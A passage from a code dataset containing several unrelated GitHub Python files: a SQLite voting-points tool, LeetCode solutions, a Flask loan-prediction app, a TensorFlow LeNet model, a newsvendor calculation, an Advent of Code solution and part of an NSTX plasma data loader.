_minus = True\n\nprint(ans)","repo_name":"ByeonghwiJeong/Algorithm_Study","sub_path":"05_Study/Chung_Ang/18_그리디_22-08-03/04_1541.py","file_name":"04_1541.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"43530414700","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport sqlite3\nimport re\n\ndb = None\nc = None\nplus_sender = 2\nplus_receiver = 10\nminus_sender = -1\nminus_receiver = -2\n\n\ndef prepare_db():\n \"\"\"Prepares the database: connect, prepare cursor\"\"\"\n global db, c\n db = sqlite3.connect('vakstars.sqlite')\n db.row_factory = sqlite3.Row\n c = db.cursor()\n\n\ndef leave_db():\n \"\"\"Ends database connection\"\"\"\n c.close()\n\n\ndef natural_date_to_sql_datestring(natural_date):\n matches = re.match(r\"([0-9]*)[^0-9]*([0-9]*)[^0-9]*([0-9]*)[^0-9]*\", natural_date)\n datestring = \"{year}-{month}-{day}\".format(year=matches.group(1),\n month=matches.group(2),\n day=matches.group(3))\n return datestring\n\n\ndef insert_profile(name, startdate):\n \"\"\"Inserts a new profile.\"\"\"\n # TODO: set a sensible startdate as default\n # Check for minimum length\n if len(name) < 3:\n raise Exception('The name is too short!')\n global c, db\n c.execute(\"\"\"\n INSERT INTO profiles(name, startdate)\n VALUES (:name, :startdate)\n \"\"\",\n {'name': name, 'startdate': startdate})\n db.commit()\n\n\ndef delete_votes_by_profile_id(id):\n \"\"\"Deletes all votes (given and received) for a profile id.\"\"\"\n global c, db\n c.execute(\"\"\"\n DELETE FROM votes\n WHERE sender = :id OR receiver = :id\n \"\"\", {'id': id})\n db.commit()\n\n\ndef delete_profile(id):\n \"\"\"Deletes a profile by id.\"\"\"\n global c, db\n c.execute(\"\"\"\n DELETE FROM profiles\n WHERE id = :id\n \"\"\", {'id': id})\n db.commit()\n delete_votes_by_profile_id(id)\n\n\ndef profile_id_by_name(name):\n \"\"\"Returns profile id by name.\"\"\"\n global c\n c.execute(\"\"\"\n SELECT COUNT(name) AS count FROM profiles\n WHERE name = :name\n \"\"\", {'name': name})\n count = c.fetchone()['count']\n\n if count != 1:\n return None\n else:\n c.execute(\"\"\"\n SELECT id\n FROM profiles WHERE name = :name\n \"\"\", {'name': name})\n return c.fetchone()['id']\n\n\ndef profile_name_by_id(id):\n \"\"\"Returns name by id.\"\"\"\n global c\n c.execute(\"\"\"\n SELECT name\n FROM profiles WHERE id = :id\n \"\"\", {'id': id})\n return c.fetchone()['name']\n\n\ndef vote(sender, receivers, date, reason, type=1):\n \"\"\"File(s) vote(s).\n\n If the receivers 
is iterable, everyone in the list will receive a vote.\n \"\"\"\n if hasattr(receivers, '__iter__'):\n [vote(sender, receiver, date, reason, type) for receiver in receivers]\n else:\n global c, db\n c.execute(\"\"\"\n INSERT INTO votes(sender, receiver, date, reason, type)\n VALUES (:sender, :receiver, :date, :reason, :type)\n \"\"\",\n {'sender': sender, 'receiver': receivers,\n 'date': date, 'reason': reason, 'type': type})\n db.commit()\n\ndef get_vote_log(start_date=None, end_date=None):\n \"\"\"Creates vote log dict from db.\"\"\"\n global c, db\n\n vote_log = []\n points = {}\n\n if start_date is None and end_date is None:\n c.execute(\"\"\"\n SELECT type, sender, receiver, date, reason\n FROM votes\n \"\"\")\n else:\n c.execute(\"\"\"\n SELECT type, sender, receiver, date, reason\n FROM votes\n WHERE date(date) >= date(:start_date) and\n date(date) <= date(:end_date)\n \"\"\",\n {'start_date': start_date, 'end_date': end_date})\n for row in c:\n if row[\"sender\"] not in points:\n points[row[\"sender\"]] = 0\n\n if row[\"receiver\"] not in points:\n points[row[\"receiver\"]] = 0\n\n sender_original_points = points[row[\"sender\"]]\n receiver_original_points = points[row[\"receiver\"]]\n\n global plus_sender, plus_receiver, minus_sender, minus_receiver\n if row[\"type\"] == 1:\n points[row[\"sender\"]] += plus_sender\n points[row[\"receiver\"]] += plus_receiver\n if row[\"type\"] == -1:\n points[row[\"sender\"]] += minus_sender\n points[row[\"receiver\"]] += minus_receiver\n\n vote = {\n 'date': row[\"date\"],\n 'type': row[\"type\"],\n 'sender': row[\"sender\"],\n 'receiver': row[\"receiver\"],\n 'reason': row[\"reason\"],\n 'sender_points_before': sender_original_points,\n 'sender_points_after': points[row[\"sender\"]],\n 'receiver_points_before': receiver_original_points,\n 'receiver_points_after': points[row[\"receiver\"]],\n }\n vote_log.append(vote)\n return {'vote_log': vote_log, 'points': points}\n\n\nhtml_escape_table = {\n \"&\": \"&amp;\",\n '\"': \"&quot;\",\n \"'\": \"&#39;\",\n \">\": \"&gt;\",\n \"<\": \"&lt;\",\n}\n\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c, c) for c in text)\n\n\ndef vote_log_to_log_table_html(vote_log):\n \"\"\"Returns the log table in HTML.\"\"\"\n for row in reversed(vote_log['vote_log'][-100:]):\n if row[\"type\"] == 1:\n typesign = \"+\"\n else:\n typesign = \"-\"\n print('<tr><td>{date}</td><td>{type}</td>' \\\n '<td>{sender}</td><td>{sender_points_before} -> {sender_points_after}</td>' \\\n '<td>{receiver}</td><td>{receiver_points_before} -> {receiver_points_after}</td>' \\\n '<td>{reason}</td>' \\\n '</tr>'.format(\n date=row[\"date\"].encode('utf-8'),\n type=typesign,\n sender=profile_name_by_id(row[\"sender\"]).encode('utf-8'),\n sender_points_before=row[\"sender_points_before\"],\n sender_points_after=row[\"sender_points_after\"],\n receiver=profile_name_by_id(row[\"receiver\"]).encode('utf-8'),\n receiver_points_before=row[\"receiver_points_before\"],\n receiver_points_after=row[\"receiver_points_after\"],\n reason=html_escape(row['reason'].encode('utf-8'))\n ))\n\n\ndef vote_log_to_points_table_html(vote_log):\n \"\"\"Returns the sorted points table in HTML.\"\"\"\n sorted_votelog = sorted(\n vote_log['points'].items(),\n key=lambda x: x[1],\n reverse=True\n )\n position = 0\n previous = None\n for profile in sorted_votelog:\n if position == 0 or (previous != None and previous != profile[1]):\n position += 1\n print(\"{list_position}. 
{name} - {points}\".format(\n list_position=position,\n name=profile_name_by_id(profile[0]).encode('utf-8'),\n points=profile[1]\n ))\n previous = profile[1]\n\ndef import_tsv(filename):\n import csv\n\n with open(filename, 'rb') as tsvfile:\n tsvreader = csv.reader(tsvfile, delimiter='\\t')\n tsvreader.next()\n names = []\n for row in tsvreader:\n names.append(row[0])\n names.append(row[1])\n nameset = set(names)\n unregistered = []\n for name in nameset:\n if profile_id_by_name(name.decode('utf-8')) is None:\n unregistered.append(name)\n if len(unregistered) > 0:\n print(\"The following names are not in the database, you have to register them manually:\")\n for name in unregistered:\n print(name)\n else:\n tsvfile.seek(0)\n tsvreader.next()\n votes = 0\n for row in tsvreader:\n sender = profile_id_by_name(row[0].decode('utf-8'))\n receiver = profile_id_by_name(row[1].decode('utf-8'))\n reason = row[2].decode('utf-8')\n date = natural_date_to_sql_datestring(row[3].decode('utf-8'))\n vote(sender, receiver, date, reason)\n votes += 1\n print(\"Successfully imported {number_of_votes} votes.\".format(number_of_votes=votes))\n\n\ndef help():\n print(\"\"\"Usage:\n vakstars.py register <name> <start date>\n vakstars.py vote <+|-> <sender> <receiver> <date> <reason>\n vakstars.py vote <+|-> <sender> [ <receiver> <receiver> ... ] <date> <reason>\n vakstars.py tsv-import <.tsv file>\n vakstars.py dump-log-table\n vakstars.py dump-points-table\n vakstars.py dump-daterange-stat <start date> <end date>\n \"\"\")\n\n\ndef select_operation(operation):\n operations = ['dump-log-table',\n 'dump-points-table',\n 'dump-daterange-stat',\n 'register',\n 'vote',\n 'tsv-import']\n if operation not in operations:\n raise Exception('No such operation!')\n else:\n prepare_db()\n if operation == \"dump-log-table\":\n vote_log_to_log_table_html(get_vote_log())\n\n if operation == \"dump-points-table\":\n vote_log_to_points_table_html(get_vote_log())\n\n if operation == \"dump-daterange-stat\":\n start_date = natural_date_to_sql_datestring(sys.argv[2].decode('utf-8'))\n end_date = natural_date_to_sql_datestring(sys.argv[3].decode('utf-8'))\n vote_log_to_points_table_html(get_vote_log(start_date, end_date))\n\n if operation == \"register\":\n name = sys.argv[2].decode('utf-8')\n date = natural_date_to_sql_datestring(sys.argv[3].decode('utf-8'))\n insert_profile(name, date)\n\n if operation == \"tsv-import\":\n filename = sys.argv[2].decode('utf-8')\n import_tsv(filename)\n\n if operation == \"vote\":\n type = None\n sign = sys.argv[2]\n if sign == \"+\":\n type = 1\n if sign == \"-\":\n type = -1\n\n sender = profile_id_by_name(sys.argv[3].decode('utf-8'))\n if sys.argv[4] != \"[\":\n receivers = profile_id_by_name(sys.argv[4].decode('utf-8'))\n argument_continue = 5\n else:\n found = False\n found_at = 0\n starting_parameter_index = 5\n i = starting_parameter_index\n while (not found) and (i < len(sys.argv)):\n if sys.argv[i] == ']':\n found_at = i\n found = True\n i += 1\n if not found:\n raise Exception('Syntax error: the receiver list is not closed!')\n elif found_at == starting_parameter_index:\n raise Exception('Syntax error: there is no receiver in the list!')\n else:\n receivers = sys.argv[starting_parameter_index: found_at]\n receivers = [profile_id_by_name(s.decode('utf-8')) for s in receivers]\n argument_continue = found_at + 1\n\n date = natural_date_to_sql_datestring(sys.argv[argument_continue].decode('utf-8'))\n reason = sys.argv[argument_continue + 1].decode('utf-8')\n\n vote(sender, receivers, date, reason, type)\n\n leave_db()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n help()\n else:\n process = 
sys.argv[1]\n\n select_operation(process)\n","repo_name":"organizedConstructors/vakstars","sub_path":"vakstars.py","file_name":"vakstars.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"13297372768","text":"'''\nGiven the head of a singly linked list, group all the nodes with odd indices together followed by the nodes with even indices, and return the reordered list.\n\nThe first node is considered odd, and the second node is even, and so on.\n\nNote that the relative order inside both the even and odd groups should remain as it was in the input.\n\nYou must solve the problem in O(1) extra space complexity and O(n) time complexity.\n'''\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def oddEvenList(self, head):\n temp = head\n odd = ListNode(0)\n odd_head = odd\n even = ListNode(-1)\n even_head = even\n\n i=1\n while temp:\n if i % 2 == 0:\n even.next = temp\n even = even.next\n else:\n odd.next = temp\n odd = odd.next\n temp = temp.next\n i+= 1\n \n odd.next = None\n even.next = None \n\n odd.next = even_head.next\n \n head = odd_head.next\n odd_head.next = None\n\n return head","repo_name":"haruna99/DSA_Questions_and_Answers","sub_path":"linkedlists/oddEvenLinkedlist.py","file_name":"oddEvenLinkedlist.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33037523601","text":"# https://leetcode.com/problems/lru-cache\n\nfrom typing import Dict, Optional\n\n\nclass Node:\n def __init__(self, key: int, value: int):\n self.key = key\n self.value = value\n self.prev: Optional[Node] = None\n self.next: Optional[Node] = None\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self._capacity = capacity\n self._cache: Dict[int, Node] = {}\n self._left = Node(0, 0)\n self._right = Node(0, 0)\n self._left.next = self._right\n self._right.prev = self._left\n\n def get(self, key: int) -> int:\n if key not in self._cache:\n return -1\n\n node = self._cache[key]\n self._remove(node)\n self._append(node)\n return node.value\n\n def put(self, key: int, value: int) -> None:\n if key in self._cache:\n self._remove(self._cache[key])\n\n node = Node(key, value)\n self._append(node)\n self._cache[key] = node\n\n if len(self._cache) > self._capacity:\n lru = self._left.next\n assert lru\n self._remove(lru)\n del self._cache[lru.key]\n\n def _append(self, node: Node) -> None:\n tmp = self._right.prev\n assert tmp\n self._right.prev = node\n node.next = self._right\n node.prev = tmp\n tmp.next = node\n\n def _remove(self, node: Node) -> None:\n assert node.next\n assert node.prev\n node.next.prev = node.prev\n node.prev.next = node.next\n","repo_name":"albertomurillo/leetcode","sub_path":"python/src/problem_146_LRUCache.py","file_name":"problem_146_LRUCache.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17802678522","text":"# save this as app.py\nfrom flask import Flask, escape, request, render_template\nimport pickle\nimport numpy as np\n\napp = Flask(__name__)\nmodel = pickle.load(open('knn.pkl', 'rb'))\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n if request.method == 'POST':\n \n gender = 
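# A minimal usage sketch, assuming the LRUCache class from the record above is
# in scope (the names below are illustrative, not from the original repo). The
# cache pairs a dict for O(1) lookup with a doubly linked list whose left end
# is the least recently used node, so eviction is O(1) as well.
lru_demo = LRUCache(2)
lru_demo.put(1, 1)
lru_demo.put(2, 2)
assert lru_demo.get(1) == 1   # touching key 1 makes it most recently used
lru_demo.put(3, 3)            # over capacity: key 2, the LRU entry, is evicted
assert lru_demo.get(2) == -1  # evicted keys return -1
assert lru_demo.get(3) == 3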
request.form['gender']\n married = request.form['married']\n dependents = request.form['dependents']\n education = request.form['education']\n employed = request.form['employed']\n credit = float(request.form['credit'])\n area = request.form['area']\n ApplicantIncome = float(request.form['ApplicantIncome'])\n CoapplicantIncome = float(request.form['CoapplicantIncome'])\n LoanAmount = float(request.form['LoanAmount'])\n Loan_Amount_Term = float(request.form['Loan_Amount_Term'])\n\n # gender\n if (gender == \"Male\"):\n gender=1\n else:\n gender=0\n \n # married\n if(married==\"Yes\"):\n married = 1\n else:\n married=0\n\n # dependents\n # a single ordinal encoding is assumed here; it must match the encoding\n # that was used when knn.pkl was trained (the model takes one value)\n if(dependents=='1'):\n dependents = 1\n elif(dependents == '2'):\n dependents = 2\n elif(dependents==\"3+\"):\n dependents = 3\n else:\n dependents = 0 \n\n # education\n if (education==\"Not Graduate\"):\n education=1\n else:\n education=0\n\n # employed\n if (employed == \"Yes\"):\n employed=1\n else:\n employed=0\n\n # property area\n # single-value encoding assumed here as well\n if(area==\"Semiurban\"):\n area = 1\n elif(area==\"Urban\"):\n area = 2\n else:\n area = 0\n\n\n ApplicantIncomelog = np.log(ApplicantIncome)\n totalincomelog = np.log(ApplicantIncome+CoapplicantIncome)\n LoanAmountlog = np.log(LoanAmount)\n Loan_Amount_Termlog = np.log(Loan_Amount_Term)\n\n prediction = model.predict([[credit, ApplicantIncomelog,LoanAmountlog, Loan_Amount_Termlog, totalincomelog, gender, married, dependents, education, employed,area ]])\n\n # print(prediction)\n\n if(prediction==1):\n prediction=\"Yes\"\n else:\n prediction=\"No\"\n\n\n return render_template(\"prediction.html\", prediction_text=\"loan status is {}\".format(prediction))\n\n\n\n\n else:\n return render_template(\"prediction.html\")\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Vinodkumar-yerraballi/Loan_status_prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
{"seq_id":"70623271725","text":"# -*- coding: utf-8 -*-\r\nimport tensorflow as tf \r\n#%%\r\ndef lenet(x,keep_prob, n_classes,is_train=True,is_pretrain=True): \r\n conv1 = conv('conv1_1',keep_prob, x, 96, kernel_size=[5,5], stride=[1,2,2,1], is_pretrain=is_pretrain)\r\n x = pool('pool1', conv1, kernel=[1,2,2,1], stride=[1,2,2,1], is_max_pool=True)\r\n conv2 = conv('conv2_1',keep_prob, x, 64, kernel_size=[5,5], stride=[1,2,2,1],is_pretrain=is_pretrain)\r\n x = pool('pool2', conv2, kernel=[1,2,2,1], stride=[1,2,2,1], is_max_pool=True)\r\n fc3 = FC_layer('fc3',keep_prob, x, out_nodes=384,relu=True)\r\n# fc3_n = batch_norm(fc3,is_train,False)\r\n fc4 = FC_layer('fc4',keep_prob,fc3,out_nodes=192,relu=True)\r\n# fc4_n = batch_norm(fc4,is_train,False)\r\n x = FC_layer('out',keep_prob,fc4,out_nodes=n_classes,relu=False)\r\n return conv1,conv2,fc3,x\r\n\r\n#%%\r\ndef conv(layer_name,keep_prob, x, out_channels, kernel_size=[3,3], stride=[1,1,1,1],is_pretrain=True):\r\n in_channels = x.get_shape()[-1]\r\n with tf.variable_scope(layer_name):\r\n w = tf.get_variable(name='weights',\r\n trainable=is_pretrain,\r\n shape=[kernel_size[0], kernel_size[1], in_channels, out_channels],\r\n initializer=tf.contrib.layers.xavier_initializer()\r\n ) \r\n b = tf.get_variable(name='biases',\r\n trainable=is_pretrain,\r\n shape=[out_channels],\r\n 
initializer=tf.constant_initializer(0.0)) \r\n# tf.add_to_collection('losses', tf.contrib.layers.l2_regularizer(2e-3)(w))\r\n x = tf.nn.conv2d(x, w, stride, padding='SAME', name='conv')\r\n x = tf.nn.bias_add(x, b, name='bias_add')\r\n x = tf.nn.dropout(x,keep_prob)\r\n x = tf.nn.relu(x, name='relu') \r\n return x\r\n#%%\r\ndef pool(layer_name, x, kernel=[1,2,2,1], stride=[1,2,2,1], is_max_pool=True):\r\n if is_max_pool:\r\n x = tf.nn.max_pool(x, kernel, strides=stride, padding='SAME', name=layer_name)\r\n else:\r\n x = tf.nn.avg_pool(x, kernel, strides=stride, padding='SAME', name=layer_name)\r\n return x\r\n\r\n#%%\r\ndef batch_norm(inputs, is_training,is_conv_out=True,decay = 0.999):\r\n\r\n scale = tf.Variable(tf.ones([inputs.get_shape()[-1]]))\r\n beta = tf.Variable(tf.zeros([inputs.get_shape()[-1]]))\r\n pop_mean = tf.Variable(tf.zeros([inputs.get_shape()[-1]]), trainable=False)\r\n pop_var = tf.Variable(tf.ones([inputs.get_shape()[-1]]), trainable=False)\r\n\r\n if is_training:\r\n if is_conv_out:\r\n batch_mean, batch_var = tf.nn.moments(inputs,[0,1,2])\r\n else:\r\n batch_mean, batch_var = tf.nn.moments(inputs,[0]) \r\n\r\n train_mean = tf.assign(pop_mean,\r\n pop_mean * decay + batch_mean * (1 - decay))\r\n train_var = tf.assign(pop_var,\r\n pop_var * decay + batch_var * (1 - decay))\r\n with tf.control_dependencies([train_mean, train_var]):\r\n return tf.nn.batch_normalization(inputs,\r\n batch_mean, batch_var, beta, scale, 0.001)\r\n else:\r\n return tf.nn.batch_normalization(inputs,\r\n pop_mean, pop_var, beta, scale, 0.001)\r\n#%%\r\ndef FC_layer(layer_name,keep_prob, x,out_nodes,relu=True):\r\n shape = x.get_shape()\r\n if len(shape) == 4:\r\n size = shape[1].value * shape[2].value * shape[3].value\r\n else:\r\n size = shape[-1].value\r\n with tf.variable_scope(layer_name):\r\n w = tf.get_variable('weights',\r\n shape=[size, out_nodes],\r\n initializer=tf.contrib.layers.xavier_initializer())\r\n b = tf.get_variable('biases',\r\n shape=[out_nodes],\r\n initializer=tf.constant_initializer(0.0))\r\n# tf.add_to_collection('losses', tf.contrib.layers.l2_regularizer(2e-3)(w))\r\n flat_x = tf.reshape(x, [-1, size])\r\n \r\n x = tf.nn.bias_add(tf.matmul(flat_x, w), b)\r\n x = tf.nn.dropout(x,keep_prob)\r\n if relu==True:\r\n x = tf.nn.relu(x)\r\n return x\r\n#%%\r\ndef loss(logits, labels):\r\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=labels,name='cross-entropy')\r\n loss = tf.reduce_mean(cross_entropy, name='loss') \r\n# tf.add_to_collection('losses', loss)\r\n# loss = tf.add_n(tf.get_collection('losses'))\r\n return loss\r\n \r\n#%%\r\ndef accuracy(logits, labels):\r\n with tf.name_scope('accuracy'):\r\n correct = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\r\n correct = tf.cast(correct, tf.float32)\r\n accuracy = tf.reduce_mean(correct)\r\n return accuracy\r\n#%%\r\ndef num_correct_prediction(logits, labels):\r\n correct = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\r\n correct = tf.cast(correct, tf.int32)\r\n n_correct = tf.reduce_sum(correct)\r\n return n_correct\r\n#%%\r\ndef optimize(loss, learning_rate, global_step):\r\n with tf.name_scope('optimizer'):\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\r\n train_op = optimizer.minimize(loss, global_step=global_step)\r\n return train_op\r\n 
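# A minimal wiring sketch for the graph builders above. The input shape, class
# count, learning rate, and variable names here are illustrative assumptions,
# not values from the original homework repo (same TF1-style API as above).
x_in = tf.placeholder(tf.float32, [None, 32, 32, 3])
y_in = tf.placeholder(tf.float32, [None, 10])
kp = tf.placeholder(tf.float32)
conv1_out, conv2_out, fc3_out, logits = lenet(x_in, kp, n_classes=10)
total_loss = loss(logits, y_in)
batch_accuracy = accuracy(logits, y_in)
global_step = tf.Variable(0, trainable=False, name='global_step')
train_op = optimize(total_loss, 1e-4, global_step)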
","repo_name":"citya1472581234/deep_learning_homework","sub_path":"HW2/problem1/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8340350737","text":"cost = int(input()) # 單位進貨成本\nretailPrice = int(input()) # 單位零售價格\nNumberOfDemand = int(input()) # 需求的可能個數\nprobability = [0.0] * (NumberOfDemand + 1) # 賣出零份、一份直到 N 份報紙的機率分布\nfor i in range(NumberOfDemand + 1):\n probability[i] = float(input())\n\nexpectedProfit = [0.0] * (NumberOfDemand + 1) # 賣j份報紙的預期利潤分布\nbestquantityOfOrder = 0\nfor j in range(NumberOfDemand + 1):\n leftProbabilitySum = 1 # 剩餘機率分布加總\n quantityOfOrder = j # 訂貨量\n bestquantityOfOrder = quantityOfOrder\n for i in range(quantityOfOrder + 1):\n expectedRevenue = i * retailPrice - quantityOfOrder * cost # 期望收入 = 需求個數*零售價 - 訂貨量*單位成本\n if i != quantityOfOrder:\n expectedProfit[j] += expectedRevenue * probability[i] # 期望利潤 = 期望收入*賣出該i份報紙的機率\n leftProbabilitySum -= probability[i]\n else:\n expectedProfit[j] += expectedRevenue * leftProbabilitySum\n\n if j > 0 and expectedProfit[j] < expectedProfit[j - 1]:\n bestquantityOfOrder -= 1\n break\n\nprint(bestquantityOfOrder, int(expectedProfit[bestquantityOfOrder]))\n","repo_name":"weixiang0815/pythonpractice","sub_path":"用Python作商管程式設計/一/w4_2.py","file_name":"w4_2.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43007906063","text":"import numpy as np\nfrom itertools import product\n\nfrom typing import Tuple\n\n\ndef count_neighbours(loc: Tuple, grid: np.array):\n neighbours_slice = tuple(slice(max(k-1, 0), min(k+1, max_k)+1) for k, max_k in zip(loc, grid.shape))\n return np.sum(grid[neighbours_slice]) - grid[loc]\n\n\ndef run(input_grid: np.array, iterations: int, size: int, fourth_dimension: bool):\n\n x_size = y_size = size+2*iterations\n z_size = 2*iterations+1\n w_size = 2*iterations+1 if fourth_dimension else 1\n\n grid = np.zeros((x_size, y_size, z_size, w_size))\n input_grid_slice = slice(iterations, iterations+size)\n grid[input_grid_slice, input_grid_slice, iterations, int(w_size/2)] = (input_grid == '#')\n\n for _ in range(iterations):\n\n next_grid = np.zeros((x_size, y_size, z_size, w_size))\n\n for loc in product(*[range(x) for x in grid.shape]):\n\n num_neighbours = count_neighbours(loc, grid)\n\n if grid[loc] == 1:\n next_grid[loc] = 1 if (2 <= num_neighbours <= 3) else 0\n elif num_neighbours == 3:\n next_grid[loc] = 1\n\n grid = next_grid\n\n return grid.sum()\n\n\nif __name__ == '__main__':\n\n with open('input.txt') as file:\n i = np.array([list(x) for x in file.read().splitlines()])\n\n print(f\"The solution to part 1 = {run(i, 6, 8, False)}\")\n print(f\"The solution to part 2 = {run(i, 6, 8, True)}\")\n","repo_name":"vmenger/AdventOfCode2020","sub_path":"src/day17/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5133405364","text":"from __future__ import print_function\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=UserWarning)\n\nimport MDSplus\nimport numpy as np\nfrom time import time\nfrom scipy.interpolate import interp1d,RectBivariateSpline,NearestNDInterpolator,LinearNDInterpolator,interpn\n\nfrom collections import OrderedDict\nimport 
tkinter.messagebox\nfrom copy import deepcopy \nimport xarray\nimport sys,os\nnp.seterr(all='raise')\nfrom IPython import embed\nimport matplotlib.pylab as plt\nimport warnings\n\ntry: \n assert 'omfit.py' in sys.argv[0]\n #preferably use OMFITncDataset class from OMFIT, data will be stored as CDF files\n from omfit_classes.omfit_data import OMFITncDataset\n Dataset = OMFITncDataset\n from omfit_classes.omfit_base import OMFITtree\n def Tree(init={}): #emulate behavior of dictionary\n tree = OMFITtree()\n tree.update(init)\n return tree \nexcept:\n #ignore file argument\n def Dataset(file,*args, **kwargs):\n return xarray.Dataset(*args, **kwargs)\n Tree = dict\n \n\ndef print_line(string):\n sys.stdout.write(string)\n sys.stdout.flush()\n\ndef printe(message):\n CSI=\"\\x1B[\"\n reset=CSI+\"m\"\n red_start = CSI+\"31;40m\"\n red_end = CSI + \"0m\" \n print(red_start,message,red_end)\n \ndef mds_load(MDSconn,TDI, tree, shot):\n if tree is not None:\n MDSconn.openTree(tree, shot)\n data = []\n for tdi in TDI:\n try:\n data.append(np.atleast_1d(MDSconn.get(tdi).data()))\n except:\n print('Loading failed: '+tdi)\n data.append(np.array([]))\n try:\n if tree is not None:\n MDSconn.closeTree(tree, shot)\n except:\n pass\n \n return data\n \ndef default_settings(MDSconn, shot):\n #Load revisions of Thomson scattering\n ts_revisions = []\n CHERS_revisions = []\n if MDSconn is not None:\n #load all available TS revisions\n MDSconn.openTree('ACTIVESPEC', shot)\n \n TDI = rf'_y = getnci(\"MPTS.OUTPUT_DATA.*\", \"node\");'\n TDI+= rf'_s = getnci(\"MPTS.OUTPUT_DATA.*:COMMENT\", \"length\") > 0;'\n TDI+= r'PACK(_y,_s)'\n try:\n ts_revisions = MDSconn.get(TDI).data()\n except:\n ts_revisions = []\n \n if len(ts_revisions) and not isinstance(ts_revisions[0],str): \n ts_revisions = [r.decode() for r in ts_revisions]\n ts_revisions = [r.strip() for r in ts_revisions]\n \n \n TDI = rf'_y = getnci(\"CHERS.ANALYSIS.*\", \"node\");'\n TDI+= rf'_s = getnci(\"CHERS.ANALYSIS.*:DATEANALYZED\", \"length\") > 0;'\n TDI+= r'PACK(_y,_s)'\n try:\n CHERS_revisions = MDSconn.get(TDI).data()\n except:\n CHERS_revisions = []\n \n if len(CHERS_revisions) and not isinstance(CHERS_revisions[0],str): \n CHERS_revisions = [r.decode() for r in CHERS_revisions]\n CHERS_revisions = sorted([r.strip() for r in CHERS_revisions])\n\n MDSconn.closeTree('ACTIVESPEC', shot)\n \n \n \n #build a large dictionary with all settings\n default_settings = OrderedDict()\n #'load_options':{'CER system':{'Analysis':('best', ('best','fit','auto','quick')),\n #'Corrections':{'Zeeman Splitting':True, 'Wall reflections':False}} }}\n \n #share position error between all diags\n horiz_error = {'R shift [cm]':0.0}\n cf_correction = ('Poloidal asymmetry correction',('None',['None','LFS','FSA']))\n\n if len(CHERS_revisions):\n #CT2 is better (for example 139037, CT2 created 2 years after CT1)\n default_chers = CHERS_revisions[-1] \n \n default_settings['Ti']={'systems':{'CER system':[]},\\\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions),'Position error':horiz_error}},\n }\n\n default_settings['omega']= {'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions),'Position error':horiz_error}}}\n \n default_settings['nC6'] = {'systems':{'CER system':[] },\n 'load_options':{'CER system':OrderedDict((('Analysis',(default_chers, CHERS_revisions)),('Position error',horiz_error), cf_correction))}}\n \n TS_options = OrderedDict(((\"TS revision\",('BEST', ts_revisions)),('Position 
error',horiz_error) ))\n \n default_settings['Te']= {'systems':{'TS system':(['LFS',True],['HFS',True]) },\n 'load_options':{'TS system':TS_options}}\n \n TS_options = OrderedDict(((\"TS revision\",('BEST', ts_revisions)),('Position error',horiz_error),cf_correction))\n \n default_settings['ne']= {'systems':{'TS system':(['LFS',True],['HFS',True])},\n 'load_options':{'TS system':TS_options}}\n \n default_settings['Zeff']= {'systems':{'VB Zeff':(['filterscope',True], )}, 'load_options':{}} \n \n if len(CHERS_revisions):\n default_settings['Mach']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions)}}}\n \n default_settings['Te/Ti']= {\\\n 'systems':{'CER system':[]},\n 'load_options':{'CER system':{'Analysis':(default_chers, CHERS_revisions)}}} \n default_settings['Zeff']['systems']['CER system'] = (['CHERS',True], )\n default_settings['Zeff']['load_options'] = {'CER system':OrderedDict((('Analysis',(default_chers, CHERS_revisions)),cf_correction))}\n \n\n \n \n return default_settings\n\nclass data_loader:\n \n def __init__(self,MDSconn, shot, eqm, rho_coord, raw=Tree()):\n \n self.MDSconn = MDSconn\n self.shot = shot\n self.eqm = eqm\n self.rho_coord = rho_coord\n self.RAW = raw\n \n def eq_mapping(self,diag, dr=0,dz=0):\n #update equilibrium mapping only if necessary\n\n if 'EQM' in diag and diag['EQM']['id'] == id(self.eqm) and self.eqm.diag == diag['EQM']['ed']\\\n and diag['EQM']['dz'] == np.mean(dz) and diag['EQM']['dr'] == np.mean(dr):\n #skip mapping\n return diag\n\n\n for sys in diag['systems']:\n #check if loaded\n if not sys in diag:\n continue\n \n #list of channels\n if isinstance(diag[sys], list):\n R,Z,T,I = [],[],[],[]\n nt = 0\n 